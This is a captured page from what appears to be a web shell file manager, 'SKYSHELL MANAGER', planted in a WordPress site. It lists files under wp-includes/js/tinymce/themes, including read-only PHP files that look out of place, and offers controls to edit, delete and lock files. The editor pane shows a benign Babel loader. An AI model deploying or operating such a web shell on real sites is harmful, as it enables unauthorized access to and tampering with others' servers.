📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: babel-core.js
const cache = require("./cache"); function initialize(babel) { exports.init = null; exports.version = babel.version; exports.DEFAULT_EXTENSIONS = babel.DEFAULT_EXTENSIONS; exports.loadOptionsAsync = babel.loadOptionsAsync; exports.transformAsync = babel.transformAsync; exports.getEnv = babel.getEnv; { exports.OptionManager = babel.OptionManager; exports.transformSync = babel.transformSync; } cache.initializeCacheFilename(); } { initialize(require("@babel/core")); } //# sourceMappingURL=babel-core.js.map
Save